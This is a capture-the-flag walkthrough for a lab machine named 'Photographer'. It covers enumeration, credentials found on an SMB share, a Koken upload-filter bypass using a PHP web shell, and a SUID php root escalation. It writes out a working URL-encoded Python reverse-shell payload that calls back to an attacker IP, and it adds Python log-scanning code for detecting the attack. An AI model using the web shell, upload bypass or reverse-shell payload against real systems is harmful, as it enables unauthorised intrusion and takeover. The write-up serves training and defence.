Photographer

Target IP: 192.168.170.76


Scanning

There are five TCP ports open on the machine: SSH, HTTP on port 80, SMB on ports 139 and 445, and a second HTTP service on port 8000. I will start my enumeration with the HTTP applications on ports 80 and 8000.


Enumeration

Port 80: HTTP

Browsing to this port shows a simple webpage. The username v1n1v131r4 is interesting. Reviewing the page source did not show anything important.

A directory search using the command gobuster dir -u http://192.168.170.76/ -w /usr/share/wordlists/dirb/big.txt -x php,html points to /assets, which contains the static files for this application, but it is not very helpful.

Port 8000: HTTP
Visiting port 8000 in a web browser displays a different site. It shows the text daisa ahomi; could that be a name? Navigating around the site did not show anything interesting.

However, while looking through the page source, I did find the name and version of the application running on this port: Koken 0.22.24.

A Google search leads to an unverified exploit for this application. It requires authentication before it can be used against this port.

A directory scan using gobuster dir -u http://192.168.170.76:8000/ -w /usr/share/wordlists/dirb/big.txt -x php,html --exclude-length 0 gave interesting results.

The /admin/ directory presents a sign-in page. Maybe we can find working credentials and sign in?

Ports 139 and 445: SMB
SMB is open, and we have read access to the share called sambashare. This share contains two files: mailsent.txt and wordpress.bkp.zip. I downloaded both of them to my machine. The first file sounds interesting.

The mail contains a lot of information. We get the names and email addresses of the two users of the HTTP applications. Could babygirl be a password? Apparently the application running on port 8000 is owned by daisa@photographer.com, so is daisa@photographer.com:babygirl a valid credential?

And it worked. I used those credentials to access the admin page. Looks like we have full control of the website, as we are admin.

The admin panel also reveals more information about the system. I want to exploit this machine manually rather than use the existing exploit.


Exploitation

Now we have access to the admin panel, it is time to exploit it.

I created a simple PHP web shell with the code <?php echo($_GET['cmd']);?> and named it shell.php.jpg. I tried to upload a PHP file as it is, but the application did not allow this. I overcame this by using Burp Suite. After pressing Import content, selecting my web shell, and pressing Import, I intercepted the POST request and made a few changes to the name of the file.

I removed the .jpg file extension inside Burp Suite, then forwarded all the intercepted HTTP requests.

My PHP webshell got uploaded successfully. To access it, I went to http://192.168.170.76:8000/storage/originals/e0/c9/shell.php.

And the PHP web shell works as expected. Time to get a reverse shell connection.

In my testing, the PHP reverse shells did not work, which is why I used Python instead. That gave me a foothold on the machine.
Payload: python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
Full URL with payload: http://192.168.170.76:8000/storage/originals/e0/c9/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
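From the defender's side, the tell-tale sign of this attack path is a request for a .php file under the application's upload directory with a cmd parameter. As an added example, not code from the original write-up, here is a small Python check that scans Apache-style access log lines for that pattern and decodes the command; the log lines are constructed samples and the upload path prefixes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (sample data, not from the original post).
SAMPLE_LOG = """\
192.168.45.211 - - [10/Jan/2024:12:00:01 +0000] "GET /admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.45.211 - - [10/Jan/2024:12:00:05 +0000] "GET /storage/originals/e0/c9/photo.jpg HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
192.168.45.211 - - [10/Jan/2024:12:00:09 +0000] "GET /storage/originals/e0/c9/shell.php?cmd=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.45.211 - - [10/Jan/2024:12:00:14 +0000] "GET /storage/originals/e0/c9/shell.php?cmd=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed upload locations: nothing stored here should ever be served as executable PHP.
UPLOAD_PREFIXES = ("/storage/", "/assets/uploads/")


def find_upload_dir_php_hits(log_text):
    """Return one dict per request that executes PHP out of an upload directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        path = unquote(parts.path)
        # ".php" anywhere in the name also catches double extensions such as shell.php.jpg,
        # which some handler configurations still pass to the PHP interpreter.
        if not path.startswith(UPLOAD_PREFIXES) or ".php" not in path.lower():
            continue
        # parse_qs already percent-decodes, so the command is readable for the analyst.
        cmd = parse_qs(parts.query).get("cmd", [""])[0]
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "path": path,
            "cmd": cmd,
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in find_upload_dir_php_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} cmd={hit['cmd']!r} status={hit['status']}")
```

The same check is cheap to run as a scheduled job over the web server's access log, and a hardened deployment would additionally disable the PHP handler for the upload directory so that such a request returns the file instead of executing it.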


Privilege Escalation

The PHP 7.2 binary has the SUID bit set. We can use this to gain root privileges.

And now we are root!


Flags

The local.txt flag is inside daisa's home directory.

The proof.txt flag could be read once I used the php binary to elevate privileges to root.